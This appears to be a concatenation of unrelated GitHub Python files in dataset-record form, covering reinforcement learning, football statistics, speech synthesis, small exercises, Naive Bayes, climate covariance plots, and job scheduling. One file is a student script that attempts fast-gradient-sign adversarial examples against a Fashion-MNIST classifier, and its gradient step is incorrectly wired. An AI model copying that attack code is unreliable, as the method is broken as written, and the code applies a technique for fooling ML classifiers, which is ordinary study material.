'./checkpoint_rnd_predictor.pth'\n\ncnn = CNN().to(DEVICE)\n\nactor_model = D4PGActor( cnn.state_size, action_size ).to(DEVICE)\nactor_target = D4PGActor( cnn.state_size, action_size ).to(DEVICE)\n\ncritic_model = D4PGCritic( cnn.state_size, action_size ).to(DEVICE)\ncritic_target = D4PGCritic( cnn.state_size, action_size ).to(DEVICE)\n\noptimizer_actor = optim.Adam( list(actor_model.parameters()) + list(cnn.parameters()), lr=LR_ACTOR, weight_decay=1e-4 )\noptimizer_critic = optim.Adam( critic_model.parameters(), lr=LR_CRITIC, weight_decay=1e-4 )\n\nrnd_target = RNDTargetModel( cnn.state_size ).to(DEVICE)\nrnd_predictor = RNDPredictorModel( cnn.state_size + action_size ).to(DEVICE)\nrnd_optimizer = optim.Adam( rnd_predictor.parameters(), lr=RND_LR, weight_decay=1e-4 )\n\nif os.path.isfile(CHECKPOINT_CNN):\n cnn.load_state_dict(torch.load(CHECKPOINT_CNN))\n \n actor_model.load_state_dict(torch.load(CHECKPOINT_ACTOR))\n actor_target.load_state_dict(torch.load(CHECKPOINT_ACTOR))\n\n critic_model.load_state_dict(torch.load(CHECKPOINT_CRITIC))\n critic_target.load_state_dict(torch.load(CHECKPOINT_CRITIC))\n\n rnd_target.load_state_dict(torch.load(CHECKPOINT_RND_TARGET))\n rnd_predictor.load_state_dict(torch.load(CHECKPOINT_RND_PREDICTOR))\n\n\ngood_memory = Memory(BUFFER_SIZE, BATCH_SIZE)\nbad_memory = Memory(BUFFER_SIZE, BATCH_SIZE)\n# good_memory = PrioritizedMemory(BUFFER_SIZE, BATCH_SIZE)\n# bad_memory = PrioritizedMemory(BUFFER_SIZE, BATCH_SIZE)\n\nnoise = OUNoise(action_size)\n\nagent = Agent(DEVICE, cnn, actor_model, noise)\noptimizer = Optimizer(\n DEVICE, \n good_memory, bad_memory,\n cnn, \n actor_model, actor_target, optimizer_actor, \n critic_model, critic_target, optimizer_critic, \n rnd_target, rnd_predictor, rnd_optimizer,\n ALPHA, GAMMA, TAU, UPDATE_EVERY, BUFFER_SIZE, BATCH_SIZE)\n\n\n# t_steps = 500\nn_episodes = 100\n\nfor episode in range(n_episodes):\n\n total_reward = 0\n life = 2\n\n state = env.reset()\n\n while True:\n # for t in range(t_steps):\n\n # action = env.action_space.sample()\n action = agent.act( state, ADD_NOISE )\n\n next_state, reward, done, info = env.step(action)\n\n actor_loss, critic_loss, rnd_loss = optimizer.step(state, action, reward, next_state, done)\n\n env.render()\n\n total_reward += reward\n\n print('\\rEpisode: {} \\tTotal: \\t{} \\tReward: \\t{} \\tLife: \\t{} \\tActor: \\t{:.5f} \\tCritic: \\t{:.5f} \\tRND: \\t{:.5f}'.format( episode + 1, total_reward, reward, life, actor_loss, critic_loss, rnd_loss ), end='')\n\n if done:\n break\n\n if info['life'] < life:\n total_reward = 0\n life = info['life']\n\n state = next_state\n\n cnn.checkpoint(CHECKPOINT_CNN) \n \n actor_model.checkpoint(CHECKPOINT_ACTOR)\n critic_model.checkpoint(CHECKPOINT_CRITIC)\n\n rnd_target.checkpoint(CHECKPOINT_RND_TARGET)\n rnd_predictor.checkpoint(CHECKPOINT_RND_PREDICTOR)\n\nenv.close()\n","repo_name":"ibrahimth/Studies-and-Researches","sub_path":"ML Python/Super_Mario_Bros_D4PG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7639697936","text":"\"\"\"\nThis file contain methods that can be used to perform basic statistical analysis about the premier league teams. \n\n\"\"\"\nfrom dataclasses import dataclass\nimport ast, csv, time\nfrom prettytable import PrettyTable\n\n@dataclass\nclass CurrentPremierLeagueTableHeader:\n position: str\n club: str\n played: int\n won: int\n drawn: int\n lost: int\n gf: int\n ga: int\n gd: int\n points: int\n form: list\n next_game: list\n\n@dataclass\nclass PastPremierLeagueTableHeader:\n position: str\n club: str\n played: int\n won: int\n drawn: int\n lost: int\n gf: int\n ga: int\n gd: int\n points: int\n form: list\n\nclass PremierLeagueClub(CurrentPremierLeagueTableHeader):\n \"\"\" \"\"\"\n\n def get_next_game(self) -> PrettyTable():\n \"\"\"\n Returns PrettyTable object that contains details information about the clubs\n next game data.\n\n example:\n >>> obj = run.view_premier('Manchester United')\n obj.get_win_draw_lost_rate()\n +-------------------+-------------+-------------+-----------+--------------+\n | Club | Action | Wining rate | draw rate | Loosing rate |\n +-------------------+-------------+-------------+-----------+--------------+\n | Manchester United | Probability | 0.5 | 0.21 | 0.29 |\n +-------------------+-------------+-------------+-----------+--------------+\n \"\"\"\n next_game_table = PrettyTable()\n # converting string list literal into normal list\n fixture = ast.literal_eval(self.next_game)\n\n next_game = [\n self.club,\n \"vs\",\n ]\n\n for index, item in enumerate(fixture):\n if index == 0 or index == 1 or index == 3:\n next_game.append(item)\n else:\n continue\n\n next_game_table.field_names = [\"Current Team\", \" \", \"Opponent\", \"date\", \"time\"]\n next_game_table.add_row(next_game)\n return next_game_table\n\n def get_wdl_rate(self) -> PrettyTable():\n \"\"\"\n calculates the win rate, draw rate and loose rate of a team.\n calculations:\n win_rate = number_of_games_won/number_of_games_played\n draw_rate = number_of_games_drawn/number_of_games_played\n lose_rate = number_of_games_lost/ number_of_games_played\n example:\n >>> obj = run.view_premier('Manchester United')\n obj.get_wdl_rate()\n\n +-------------------+-------------+-------------+-----------+------------------+\n | Club | Games Played | Wining rate | draw rate | Loosing rate |\n +-------------------+-----------------+-------------+-----------+--------------+\n | Manchester United | 37 | 0.5 | 0.27 | 0.23 |\n +-------------------+-------------+-------------+-----------+------------------+\n \"\"\"\n pretty_table = PrettyTable()\n\n wdl = [\n self.club,\n self.played,\n round(self.won / (self.played) * 1, 2),\n round(self.drawn / (self.played) * 1, 2),\n round(self.lost / (self.played) * 1, 2),\n ]\n pretty_table.field_names = [\n \"Club\",\n \"Games Played\",\n \"Win rate\",\n \"draw rate\",\n \"Loose rate\",\n ]\n\n pretty_table.add_row(wdl)\n return pretty_table\n\n def compare(self, other_team) -> tuple(PrettyTable()):\n \"\"\"\n Compares two teams wdl rate and displays it in a tabular format\n \"\"\"\n clubs = PremierLeagueClub.create_premier_clubs()\n other_table = PrettyTable()\n\n for obj in clubs:\n if obj.club == other_team:\n # construct a pretty table for the other_team wdl_rate table.\n wdl = [\n obj.club,\n obj.played,\n round(obj.won / (obj.played) * 1, 2),\n round(obj.drawn / (obj.played) * 1, 2),\n round(obj.lost / (obj.played) * 1, 2),\n ]\n other_table.field_names = [\n \"Club\",\n \"Games Played\",\n \"Win rate\",\n \"draw rate\",\n \"Loose rate\",\n ]\n other_table.add_row(wdl)\n\n # where pretty table magic happens\n print(\n f\"{self.club.upper()} WIN, DRAW & LOOSE RATE AFTER {self.played} GAMES\"\n )\n time.sleep(5)\n print(self.get_wdl_rate())\n time.sleep(3)\n\n print(\n f\"{obj.club.upper()} WIN, DRAW & LOOSE RATE AFTER {obj.played} GAMES\"\n )\n time.sleep(5)\n print(other_table)\n else:\n continue\n\n # return other_table\n\n @staticmethod\n def create_premier_clubs() -> list:\n \"\"\"\n Function to read through a csv file, instantiate `PremierLeagueClub` class.\n It's stores object created in a list.\n returns a list of objects.\n \"\"\"\n store_obj = []\n \n # read the csv\n with open(\"table_data\\English Premier League.csv\", \"r\") as file:\n reader = csv.DictReader(file)\n for row in reader:\n # create instance for each team.\n obj = PremierLeagueClub(\n position=int(row[\"Position\"]),\n club=row[\"Club\"],\n played=int(row[\"Played\"]),\n won=int(row[\"Won\"]),\n drawn=int(row[\"Drawn\"]),\n lost=int(row[\"Lost\"]),\n gf=int(row[\"GF\"]),\n ga=int(row[\"GA\"]),\n gd=int(row[\"GD\"]),\n points=int(row[\"Points\"]),\n form=row[\"Form\"],\n next_game=row[\"Next Game\"],\n )\n store_obj.append(obj)\n return store_obj\n","repo_name":"gilbertekalea/PremierLeague","sub_path":"premier_league/current_report.py","file_name":"current_report.py","file_ext":"py","file_size_in_byte":6103,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"33230224772","text":"#\n# inference_multispeaker_synthesis.py\n#\n# Module for interfacing with MultispeakerSynthesis. All dependencies\n# for MultispeakerSynthesis must have been properly installed first,\n# with the multispeaker_synthesis repo having been placed adjacent\n# to the cloud_inference_server code. Don't forget to add the model!\n#\n# As a reminder, every single method supported by handlers must\n# return a tuple, with [0] = HTTP code and [1] = content (or error\n# message), and [2] = key for whatever postprocessing you need\n# (Ex) \"encode_base64\")\n\nfrom inference_modules_config import *\n\nimport http\n\nclass MultispeakerSynthesis:\n # Given model variants location, how do we get to synthesizer models? \n _model_variants_synthesizer_subpath = \"synthesizer\"\n _model_suffix = \".pt\"\n _vocoder = \"sv2tts\"\n\n def __init__(self, dynamic_load_class):\n \"\"\"\n On startup, load the synthesizer into memory in anticipation of\n incoming requests. All of this is done by the kotakee companion\n utility code, so there's no copies of the same code to maintain. \n \"\"\"\n print(\"[DEBUG] MultispeakerSynthesis - Initializing model variant \"+str(multispeaker_synthesis_model_num)+\"...\")\n\n # Now go ahead and load the kotakee companion files that we'll\n # be using. This is to avoid duplicate code and increase \n # simplicity of implementation. \n self._utility_class_type = dynamic_load_class(module_name=multispeaker_synthesis_kotakee_utility, \n class_name=multispeaker_synthesis_kotakee_utility_class)\n assert self._utility_class_type is not None\n self._utility_class = self._utility_class_type(\n model_num = multispeaker_synthesis_model_num, \n model_variants_location = multispeaker_synthesis_models_location, \n speakers_location = multispeaker_synthesis_speakers_location, \n inference_location = multispeaker_synthesis_inference_location, \n inference_class_name = multispeaker_synthesis_inference_class_name,\n vocoder = self._vocoder\n )\n\n def synthesize_text(self, speaker_id, text):\n \"\"\"\n Given the speaker id and the text in one large string, go and \n synthesize a wav and provide that back to the handler, who will\n encode it in base64 to be consumed by users. \n \"\"\"\n # If we get a byte array or a bytes-like object, make sure it's a\n # string. \n if isinstance(text, (bytes, bytearray)):\n text = text.decode()\n\n # Use the utility to manage everything. We will get an array of\n # wavs back. \n wavs = self._utility_class.speaker_synthesize_speech(texts=[text], speaker_id=speaker_id, utterance_id=\"\")\n if wavs is None or len(wavs) == 0:\n return http.HTTPStatus.BAD_REQUEST, \"Speech Synthesis failed. Please verify speaker id.\", None\n \n return http.HTTPStatus.OK, wavs, \"encode_base64_list\"","repo_name":"ArthurlotLi/cloud_inference_server","sub_path":"inference_modules/multispeaker_synthesis.py","file_name":"multispeaker_synthesis.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"14988977000","text":"d = {9103976271:[(\"Reina\", \"Meinhard\"), (\"Memphis\", \"Tennessee\")],\n4199392609:[(\"Stephanie\", \"Bruce\"), (\"Greensboro\", \"North Carolina\")],\n9099459979:[(\"Ermes\", \"Angela\"), (\"Dallas\", \"Texas\")],\n6123479367:[(\"Lorenza\", \"Takuya\"), (\"Indianapolis\", \"Indiana\")],\n7548993768:[(\"Margarete\", \"Quintin\"), (\"Raleigh\", \"North Carolina\")]}\n\nnumber = int(input())\n\nif number in d:\n res = d[number]\n print(f\"{res[0][0]} {res[0][1]} from {res[1][0]}, {res[1][0]}\")\nelse:\n print(\"nothing was found\")\n\nres = d.get(number)\nif res:\n print(f\"{res[0][0]} {res[0][1]} from {res[1][0]}, {res[1][0]}\")\nelse:\n print(\"nothing was found\")\n\n","repo_name":"MikitaTsiarentsyeu/Md-PT1-59-22","sub_path":"Lessons/lesson 26.11.22/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":628,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"30303967594","text":"#Project: CIS 177 WEEK 9 PROJECT\n#Project Location: projects\\cis177\\LouiesBBQTracker\n#File: LouiesBBQTracker.py\n#Purpose: Keep track of a reservation list at Louie's BBQ,\n# keeping a VIP list as well\n#Revision: 1.0 / 27 MAR 2017\n#Created: 27 MAR 2017\n#Author: Rick Miller \n\nwaitlist = [] # This will be the waiting list for Louie's BBQ\n\n# This function will add a name to the end of the list. list.append will add the entry to the end of the list\n# NOTE: For accuracy, all user entries are converted to and stored as upper case, this will allow unambiguous entry of\n# a name to remove or find in other functions. This is becuse \"smith\", \"Smith\", \"SMITH\" and \"SmItH\" are all different\n# strings in python.\ndef add_name(my_list):\n nameToAdd = input('Enter the party\\'s name to add: ').upper()\n my_list.append(nameToAdd)\n\n# This function will add a name to the beginning of the given list. Note that list.insert(0) will add the entry\n# as the first entry in the list. Note that each VIP is simply added to the beginning of the list, without keeping\n# a separate VIP list\ndef add_VIP(my_list):\n nameToAdd = input('Enter the VIP party\\'s name to add: ').upper()\n my_list.insert(0, nameToAdd)\n\n# This name will remove a name from the given list. Note that the index function will return the first instance of the\n# entered name. It's up to the user to keep track of which real-life \"smith\" the user is sending away, for instance.\ndef remove_name(my_list):\n nameToRemove = input('Enter the name to remove: ').upper()\n if nameToRemove in my_list: # is the name on the list at least once?\n indexToRemove = my_list.index(nameToRemove) # if it is, then remove the first instance of that name\n my_list.pop(indexToRemove)\n else: # the name isn't on the list so tell the user\n print('Sorry,', nameToRemove,'not on the list.')\n\ndef table_ready(my_list):\n if len(my_list) > 0: # make sure the list isn't empty!\n tableName = my_list[0] # get the next name on the list\n print('A table is now ready for',tableName,'and that name has been removed from the list') # tell the user...\n my_list.pop(0) # ...and remove the name from the list\n else: # the list is empty, so tell the user\n print('\\nEMPTY')\n\ndef print_list(my_list):\n if len(my_list) > 0: # is there at least one name on the list?\n print('\\nCurrent list:') # if there is, print a header\n print('-------------')\n for name in my_list: # then for each name on the list...\n print(name) # ...print the names, one per line\n else: # nothing on the list, so tell the user\n print('\\nEMPTY')\n\ndef print_next_name(my_list):\n if len(my_list) > 0: # if the list isn't empty\n print('The next name on the list is:', my_list[0]) # ...so tell the user who the next person on the list is\n else: # the list is empty\n print('\\nEMPTY') # ...so tell the user\n\n# *** MAIN LOOP STARTS HERE! ***\n\nuserChoice = ''\n\nwhile userChoice != 'q': # this loop will repeat until the user selects 'q'\n print('\\nLouie\\'s BBQ Restaurant Reservation System') # print the menu\n print('\\nMain Menu\\n')\n print('A - Add a name to the list')\n print('V - Add a VIP to the list')\n print('R - Remove a name from the list')\n print('P - Print the list')\n print('N - Print the next party to get a table')\n print('T - Assign a table to the next party on the list')\n print('Q - Quit the program')\n userChoice = input('Please enter yout selection: ')[0].lower()\n if userChoice in ('a', 'v', 'r', 'p', 'n', 't', 'q'): # check if the user has entered a valid choice\n if userChoice == 'a': # if the user has enetered a valid choice, go to the right function\n add_name(waitlist)\n elif userChoice == 'v':\n add_VIP(waitlist)\n elif userChoice == 'r':\n remove_name(waitlist)\n elif userChoice == 't':\n table_ready(waitlist)\n elif userChoice == 'p':\n print_list(waitlist)\n elif userChoice == 'n':\n print_next_name(waitlist)\n else: # the user didn't make a valid choice. Note that 'q' is a valid choice but will bypass this message\n print('Sorry, invalid choice. Try again!')\nprint('End of program') # user chose 'q' so the program ends here.\n","repo_name":"rickthegeek/LouiesBBQTableTracker","sub_path":"LouiesBBQTableTracker/LouiesBBQTableTracker.py","file_name":"LouiesBBQTableTracker.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"6032213118","text":"\"\"\"\nThis is an implementation of a Naive Bayes classifier under the following assumptions:\n 1) class labels can be approximated by the multinomial distribution\n 2) the likelihood of the class labels can be approximated by a Poisson\n distribution with parameter lambda, for each class.\n 3) the parameter lambda has a prior gamma distribution with parameters (2, 1)\n\nThe maximum a posteriori estimates are then derived to learn the unknown parameters.\nThese are overly simplified and convenient assumption, but usually perform well.\n\"\"\"\nfrom .General import *\n\n\ndef _get_class_probs(y):\n \"\"\"\n Gets the class proportions (class priors) for the target variable\n :param y: n-length array of targets\n :return: dictionary with keys = target variable,\n values = target variable probability\n \"\"\"\n class_p = {}\n for class_ in np.unique(y):\n class_p[str(class_)] = (y == class_).sum() / len(y)\n return class_p\n\n\ndef _get_class_lambdas(x, y):\n \"\"\"\n Gets the likelihood estimates for lambda parameter,\n for each class in y.\n :param x: n-by-d training data feature matrix\n :param y: n-by-1 training data label vector\n :return: dictionary where keys = class labels (as string)\n and values = 1-by-d dimensional arrays\n \"\"\"\n class_lambdas = {}\n for class_ in np.unique(y):\n sub_x = x[y[:, 0] == class_]\n class_lambdas[str(class_)] = (1 + sub_x.sum(axis=0)) / (len(sub_x) + 1)\n return class_lambdas\n\n\ndef _get_likelihood(features, lambdas):\n \"\"\"\n Gets the likelihood probability estimate of a test set record\n for a given set of lambda estimates for a given class\n :param features: 1-by-d array of a test set record\n :param lambdas: calculated lambda estimates\n :return: the likelihood estimate (evaluated on a scaled Poisson)\n \"\"\"\n lamb_raise_x = lambdas ** features\n exp_raise_lamb = np.exp(-1 * lambdas)\n return (lamb_raise_x * exp_raise_lamb).prod()\n\n\ndef predict(x_0, class_p, class_lambdas):\n \"\"\"\n Evaluates the MAP solution for a given test set record,\n based on learned parameters.\n :param x_0: 1-by-d array of test record features\n :param class_p: class probability estimates\n :param class_lambdas: dictionary of learned lambdas\n :return: highest probability prediction\n \"\"\"\n max_prob = -1\n prediction = None\n\n for class_ in class_lambdas:\n likelihood = _get_likelihood(x_0, class_lambdas[class_])\n class_prob = class_p[class_]\n posterior = likelihood * class_prob\n\n if posterior > max_prob:\n prediction = int(class_)\n max_prob = posterior\n\n return prediction\n\n\ndef train(x_train, y_train):\n \"\"\"\n Learns the prior distribution of class and the MAP estimates\n for lambdas in each class under the assumptions outlined at\n the top of this file\n :param x_train: n-by-d matrix of training feature data\n :param y_train: n-by-1 array of training labels\n :return: dictionary of multinomial class probabilities and\n dictionary of learned lambda parameters for all\n feature dimensions for each class\n \"\"\"\n return _get_class_probs(y_train), _get_class_lambdas(x_train, y_train)\n\n\ndef naive_bayes(x, y, cv=1, test_prop=0.2, scale=False, neg=0,\n randomize=True, poly_expand=1, accuracy=True):\n \"\"\"\n Performs naive bayes (multi-class) classification and returns scores\n (accuracy or confusion matrix).\n\n Can also specify whether to scale the data, perform cross validation,\n or whether to perform a polynomial expansion of given degree on the\n feature space.\n\n :param x: feature data matrix\n :param y: target array\n :param cv: integer number of cross validation folds\n :param test_prop: test proportion when CV = 1\n :param scale: boolean indicating whether to standardize features\n :param randomize: boolean indication whether to shuffle data\n :param poly_expand: degree number to expand feature space\n :param neg: negative class label in target array; used for confusion matrix\n :param accuracy: boolean; if changed to False and it's binary classification,\n then will return confusion matrix instead of accuracy.\n :return: list of accuracy scores for each test set evaluation, unless\n accuracy == False and it's a binary classification problem - then\n it will return a list of confusion matrices\n \"\"\"\n # expand feature space by polynomial\n x = expand_features(x, poly_expand, False)\n\n # determine bin sizes for cross validation splits\n bin_sizes = get_bin_sizes(len(y), cv, test_prop)\n\n # permute order for cross validation\n order = np.random.permutation(len(y)) if randomize else np.arange(0, len(y))\n\n # initialize list to store accuracies OR confusion matrices from each split\n scores = []\n\n for split in range(cv):\n # get train-test split and standardize if scale = True\n x_test, y_test, x_train, y_train = get_split(x, y, bin_sizes, order, split)\n x_train, x_test = standardize(x_train, x_test) if scale else (x_train, x_test)\n\n # train model on data\n class_p, class_lambdas = train(x_train, y_train)\n\n # predict, append confusion matrix to scores list\n y_pred = np.array([predict(row, class_p, class_lambdas) for row in x_test]).reshape(-1, 1)\n\n if accuracy or len(class_p) != 2:\n scores.append(((y_test - y_pred) == 0).sum()/len(y_pred))\n else:\n scores.append(get_conf_mat(y_pred, y_test, neg))\n\n return scores\n\n","repo_name":"PGrantcharov/ml-package","sub_path":"mlAlgos/NaiveBayes.py","file_name":"NaiveBayes.py","file_ext":"py","file_size_in_byte":5603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74951265746","text":"\"\"\"\nUse fast gradient sign method to craft adversarial on MNIST.\n\nDependencies: python3, tensorflow v1.4, numpy, matplotlib\n\"\"\"\nimport os\n\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\n\nimport tensorflow as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Flatten\nfrom keras.layers import Conv2D, MaxPooling2D\nfrom keras import backend as K\n# 引入Tensorboard\nfrom keras.callbacks import TensorBoard\n# from tensorflow import keras\nfrom fgsm import *\n\n\nimg_rows = 28\nimg_cols = 28\nimg_channel = 1\nnum_classes = 10\nbatch_size = 128\nepochs = 1\neps = 0.5\nprint('\\nLoading Fashion MNIST')\n\n#preprocess data\nfashion_mnist = keras.datasets.fashion_mnist\n(X_train, Y_train), (X_test, Y_test) = fashion_mnist.load_data()\n\nif K.image_data_format() == 'channels_first':\n X_train = X_train.reshape(X_train.shape[0], 1, img_rows, img_cols)\n X_test = X_test.reshape(X_test.shape[0], 1, img_rows, img_cols)\n input_shape = (1, img_rows, img_cols)\nelse:\n X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)\n X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)\n input_shape = (img_rows, img_cols, 1)\n\nX_train = X_train.astype('float32')\nX_test = X_test.astype('float32')\nX_train /= 255\nX_test /= 255\n\nto_categorical = keras.utils.to_categorical\nY_train = to_categorical(Y_train)\nY_test = to_categorical(Y_test)\n\nprint('\\nSpliting data')\n\nind = np.random.permutation(X_train.shape[0])\nX_train, Y_train = X_train[ind], Y_train[ind]\n\n# split the data to validation set 20% and trainning set 80%\nVALIDATION_SPLIT = 0.2\nn = int(X_train.shape[0] * (1-VALIDATION_SPLIT))\nX_valid = X_train[n:]\nX_train = X_train[:n]\nY_valid = Y_train[n:]\nY_train = Y_train[:n]\n\nprint('X_train shape:', X_train.shape)\nprint(X_train.shape[0], 'train samples')\nprint(X_valid.shape[0], 'valid samples')\nprint(X_test.shape[0], 'test samples')\n\nprint('\\nConstruction graph')\n\nclass_names = ['T-shirt/top', 'Trouser', 'Pullover', 'Dress', 'Coat',\n 'Sandal', 'Shirt', 'Sneaker', 'Bag', 'Ankle boot']\nmodel = Sequential()\nmodel.add(Conv2D(32, kernel_size=(3, 3),\n activation='relu',\n input_shape=input_shape))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\nmodel.add(Conv2D(64, (3, 3), activation='relu'))\nmodel.add(MaxPooling2D(pool_size=(2, 2)))\n#model.add(Dropout(0.25))\nmodel.add(Flatten())\nmodel.add(Dense(128, activation='relu'))\nmodel.add(Dropout(0.25))\nmodel.add(Dense(num_classes, activation='softmax'))\n\nmodel.compile(loss=keras.losses.categorical_crossentropy,\n optimizer=keras.optimizers.Adadelta(),\n metrics=['accuracy'])\n\ntbCallBack = TensorBoard(log_dir='./logs', # log 目录\n histogram_freq=0,\n write_images=True)\n\nmodel.fit(X_train, Y_train,\n batch_size=batch_size,\n epochs=epochs, \n verbose=1,\n validation_data=(X_valid, Y_valid),\n callbacks=[tbCallBack])\n\nscore = model.evaluate(X_test, Y_test, verbose=0)\nprint('Test loss:', score[0])\nprint('Test accuracy:', score[1])\n\npredictions = model.predict(X_test)\nprint(\"predictions 0\", predictions[0])\nprint(\"labels 0\", Y_test[0])\n#loss = tf.nn.softmax_cross_entropy_with_logits(labels=target, logits=logits)\ndef plot_image(i, predictions_array, true_label, img):\n predictions_array, true_label_array, img = predictions_array[i], true_label[i], img[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n d = img.reshape(28,28)\n #print(\"img 0\", img)\n plt.imshow(d, cmap=\"gray\")\n\n predicted_label = np.argmax(predictions_array)\n true_label = np.argmax(true_label_array)\n print(\"predicted_label true_label\", predicted_label, true_label)\n if predicted_label == true_label:\n color = 'blue'\n else:\n color = 'red'\n\n plt.xlabel(\"{} {:2.0f}% ({})\".format(class_names[predicted_label],\n 100*np.max(predictions_array),\n class_names[true_label]),\n color=color)\n\ndef plot_value_array(i, predictions_array, true_label):\n predictions_array, true_label_array = predictions_array[i], true_label[i]\n plt.grid(False)\n plt.xticks([])\n plt.yticks([])\n thisplot = plt.bar(range(10), predictions_array, color=\"#777777\")\n plt.ylim([0, 1])\n predicted_label = np.argmax(predictions_array)\n true_label = np.argmax(true_label_array)\n thisplot[predicted_label].set_color('red')\n thisplot[true_label].set_color('blue')\n\n# i = 0\n# plt.figure(figsize=(6,3))\n# plt.subplot(1,2,1)\n# plot_image(i, predictions, Y_test, X_test)\n# plt.subplot(1,2,2)\n# plot_value_array(i, predictions, Y_test)\n# plt.show()\n\norigin = X_test[0]\n#x = tf.placeholder(tf.float32, (None, img_rows, img_cols, img_channel), name='x')\nxadv = tf.identity(origin)\nprint(\"xadv\", xadv)\ntarget = Y_test[0]\nlogits = predictions[0]\nloss = tf.nn.softmax_cross_entropy_with_logits(labels=target, logits=logits)\ndy_dx, = tf.gradients(loss, xadv)\nxadv = tf.stop_gradient(xadv + eps*tf.sign(dy_dx))\nprint(\"xadv\", xadv)\n# xadv = tf.clip_by_value(xadv, 0.1, 1)\n\n# plt.figure(figsize=(6,3))\n# plt.subplot(2,2,1)\n# plt.imshow(origin.reshape(28,28), cmap=\"gray\")\n# plt.subplot(2,2,2)\n# plt.imshow(xadv.reshape(28,28), cmap=\"gray\")\n# plt.show()","repo_name":"fishlao/master_homework","sub_path":"deep_learning/fgsm_attack/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"32391622644","text":"from OptimalArray.Utilities.CorMat import CovCM4Global,CovCM4Indian,CovCM4SO,CovCM4NAtlantic,CovCM4TropicalAtlantic,CovCM4SAtlantic,CovCM4NPacific,CovCM4TropicalPacific,CovCM4SPacific,CovCM4GOM,CovCM4CCS\nimport matplotlib.pyplot as plt\nimport cartopy.crs as ccrs\n\n\n\ndef plot_cov(self):\n\tplottable = self.trans_geo.transition_vector_to_plottable(self.diagonal())\n\tXX,YY,ax = self.trans_geo.plot_setup()\n\tax.pcolormesh(XX,YY,plottable,vmax = (plottable.mean()+(3*plottable.std())))\n\n\nfor covclass in [CovCM4Global,CovCM4Indian,CovCM4SO,CovCM4NAtlantic,CovCM4TropicalAtlantic,CovCM4SAtlantic,CovCM4NPacific,CovCM4TropicalPacific,CovCM4SPacific,CovCM4GOM,CovCM4CCS]:\n\tfor depth in [2,4,6,8,10,12,14,16,18,20]:\n\t\tdummy = covclass(depth_idx = depth)\n\t\tfor var_1 in dummy.trans_geo.variable_list:\n\t\t\tfor var_2 in dummy.trans_geo.variable_list:\n\t\t\t\ttry:\n\t\t\t\t\tcov = dummy.get_cov(var_1,var_2)\n\t\t\t\t\tidx_1 = dummy.trans_geo.variable_list.index(var_1)\n\t\t\t\t\tidx_2 = dummy.trans_geo.variable_list.index(var_2)\n\t\t\t\texcept FileNotFoundError:\n\t\t\t\t\tcov = dummy.get_cov(var_2,var_1)\n\t\t\t\t\tidx_1 = dummy.trans_geo.variable_list.index(var_2)\n\t\t\t\t\tidx_2 = dummy.trans_geo.variable_list.index(var_1)\n\t\t\t\tcov.plot_cov = plot_cov\n\t\t\t\tcov.plot_cov(cov)\n\t\t\t\tplt.savefig(dummy.trans_geo.file_handler.out_file(\"cov_\" + var_1 + \"_\" + var_2))\n\t\t\t\tplt.close()","repo_name":"Chamberpain/OptimalArray","sub_path":"Utilities/Diagnostics.py","file_name":"Diagnostics.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37881401611","text":"from aiida.schedulers.plugins.lsf import LsfScheduler\n\n\nclass ETHZEulerLsfScheduler(LsfScheduler):\n \"\"\"\n The ETHZ Euler LSF scheduler requires memory and scratch space to be\n reserved with the line\n #BSUB -R \"rusage[mem=X,scratch=Y]\"\n where X and Y are specified in units of MB per cpu\n \"\"\"\n\n def _get_submit_script_header(self, job_tmpl):\n if job_tmpl.max_memory_kb:\n lsf_script_lines = super()._get_submit_script_header(job_tmpl).splitlines()\n\n physical_memory_kb = int(job_tmpl.max_memory_kb)\n num_mpiprocs = job_tmpl.job_resource.get_tot_num_mpiprocs()\n mem_per_proc_mb = physical_memory_kb // (1024 * num_mpiprocs)\n\n rusage_added = False\n new_lines = []\n for line in lsf_script_lines:\n if line.startswith(\"#BSUB -M\"):\n # Skip the BSUB -M line.\n continue\n if not line.startswith(\"#\") and not rusage_added:\n # Add the rusage line after the other #BSUB commands.\n rusage_line = '#BSUB -R \"rusage[mem={},scratch={}]\"'.format(\n mem_per_proc_mb, 2 * mem_per_proc_mb\n )\n new_lines.append(rusage_line)\n rusage_added = True\n\n new_lines.append(line)\n\n return \"\\n\".join(new_lines)\n\n # If memory is not specified, just use the default LSF script.\n return super()._get_submit_script_header(job_tmpl)\n","repo_name":"nanotech-empa/aiida-nanotech-empa","sub_path":"aiida_nanotech_empa/schedulers/lsf_ethz_euler.py","file_name":"lsf_ethz_euler.py","file_ext":"py","file_size_in_byte":1523,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"3048209572","text":"from src.logger.logger import Logging\nfrom sqlalchemy import select\nfrom src.database.core.engine import SQLEngine\nfrom src.database.tables.setup import LogsTable\nfrom src.settings.logs import settingLogs\n\n\nasync def logs_memory_cache(bot):\n db_conn = SQLEngine.engine.connect()\n\n query = select(LogsTable)\n logs = db_conn.execute(query).all()\n\n if not logs:\n Logging().info(\"No logs to load in cache\")\n return\n\n for log in logs:\n await settingLogs.set_logs(\n bot=bot,\n server_id=log[1],\n 